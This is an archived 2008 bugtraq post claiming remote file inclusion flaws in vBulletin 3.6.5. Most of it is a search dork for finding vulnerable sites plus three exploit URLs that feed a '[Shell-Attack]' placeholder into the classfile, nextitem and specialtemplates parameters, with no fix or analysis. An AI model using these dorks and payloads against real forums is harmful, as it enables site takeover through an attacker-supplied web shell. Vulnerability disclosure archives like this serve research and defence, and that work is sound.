bugtraq June 2008 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: Re: RFI ====> vBulletin v3.6.5

Re: RFI ====> vBulletin v3.6.5

From: <hh-ua_at_nospam>
Date: Wed Jun 18 2008 - 17:57:27 GMT
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is)
By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed] - Israel Greetz : -Fairoz-

vBulletin v3.6.5
Dork : "Powered by vBulletin v3.6.5. Copyright 2000 - 2007 "

Exploits :

http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]

http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Att ack]

http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemp lates=[Shell-Attack]

Discovred By Hasadya Raed
Have A Good Time

[ reply ]